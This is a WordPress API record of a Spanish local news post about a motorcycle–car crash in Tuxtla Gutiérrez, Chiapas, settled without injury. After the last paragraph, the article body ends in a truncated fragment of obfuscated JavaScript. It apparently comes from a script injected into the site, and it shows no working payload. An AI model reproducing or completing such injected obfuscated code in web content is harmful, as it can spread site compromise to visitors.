{"id":16394,"date":"2024-06-28T05:12:35","date_gmt":"2024-06-28T05:12:35","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=16394"},"modified":"2024-06-28T05:12:36","modified_gmt":"2024-06-28T05:12:36","slug":"choque-entre-moto-y-coche-deja-cuantiosos-danos-materiales","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=16394","title":{"rendered":"Choque entre moto y coche, deja cuantiosos da\u00f1os materiales"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/06\/FB_IMG_1719551432850-1024x576.jpg\" alt=\"\" class=\"wp-image-16395\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/06\/FB_IMG_1719551432850-1024x576.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/06\/FB_IMG_1719551432850-300x169.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/06\/FB_IMG_1719551432850-768x432.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/06\/FB_IMG_1719551432850.jpg 1080w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Jairo Camacho.<\/p>\n\n\n\n<p>Agencia ReporteCiudano, 27 de junio del 2024. Tuxtla Guti\u00e9rrez. &#8211; Un choque entre una moto Italika de color rojo 300CC y un Chevrolet Aveo de color azul a la altura de la<br>13 Sur y 11 Poniente del Barrio San Francisco dej\u00f3 cuantiosos da\u00f1os materiales.<\/p>\n\n\n\n<p>Este hecho ocurri\u00f3 este jueves cuando los dos conductores se desplazaban sobre el Bulevar de Sur a Norte, y al incorporarse a la 11 Avenida colisionaron.<\/p>\n\n\n\n<p>De acuerdo con el conductor de la moto, el coche le cerr\u00f3 el paso y se impact\u00f3 contra la parte del copiloto.<\/p>\n\n\n\n<p>Al lugar arribaron elementos de tr\u00e1nsito municipal y los involucrados llegaron a un acuerdo armonioso y se retiraron del lugar.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho. Agencia ReporteCiudano, 27 de junio del 2024. Tuxtla Guti\u00e9rrez. &#8211; Un choque entre una moto Italika de color rojo 300CC y un Chevrolet Aveo de color azul a la altura de la13 Sur y 11 Poniente del Barrio San Francisco dej\u00f3 cuantiosos da\u00f1os materiales. Este hecho ocurri\u00f3 este jueves cuando los dos conductores &hellip;<\/p>\n","protected":false},"author":2,"featured_media":16396,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-16394","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/16394","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=16394"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/16394\/revisions"}],"predecessor-version":[{"id":16397,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/16394\/revisions\/16397"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/16396"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=16394"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=16394"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=16394"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}